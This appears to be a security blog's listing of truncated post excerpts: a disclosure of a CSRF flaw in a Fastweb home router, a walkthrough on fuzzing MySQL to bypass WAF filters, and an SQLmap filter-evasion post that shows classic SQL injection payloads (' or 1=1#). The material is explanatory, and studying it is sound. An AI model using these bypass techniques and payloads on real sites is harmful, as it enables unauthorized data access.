In May 2020, I discovered a CSRF vulnerability affecting the web administration panel of my home router. The router was provided to me by Fastweb, an Italian ISP company with which I have an active Internet subscription. The vulnerable router model is listed below, in the “System Affected” section.
The administration web panel of the router is vulnerable to Cross Site Request Forgery (CVE 2020-13620).
As stated by the OWASP:
“Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated. With a little help of…
In this article I will show you a simple technique I learned following this talk about SQL injection obfuscation and optimization: https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf
The talk is very interesting and I suggest you to give a look at the slides linked above.
During the talk, among other things, it’s explained how in some situations it can be very useful to write a little fuzzer for a DBMS (I will use MySQL in this exercise) in order to find some weird characters that may help you to bypass weak security filters or WAFs during a web security assessment.
Let’s simulate a situation where…
SQLmap is a very useful tool when you want to automatize the exploitation of a SQL Injection vulnerability and extract protected data from a web site. Often, in order to defend against this type of attacks, developers introduce some keyword filters and/or use a WAF (Web Application Firewall) that blocks common SQL Injections payloads.
Most of the time, this type of filters are regex-based. Let’s see an example:
This simple filter blocks the keywords OR and AND and is case insensitive (note the i at the end of the regex). So, classic payloads like:
' or 1=1#
' and 1=2#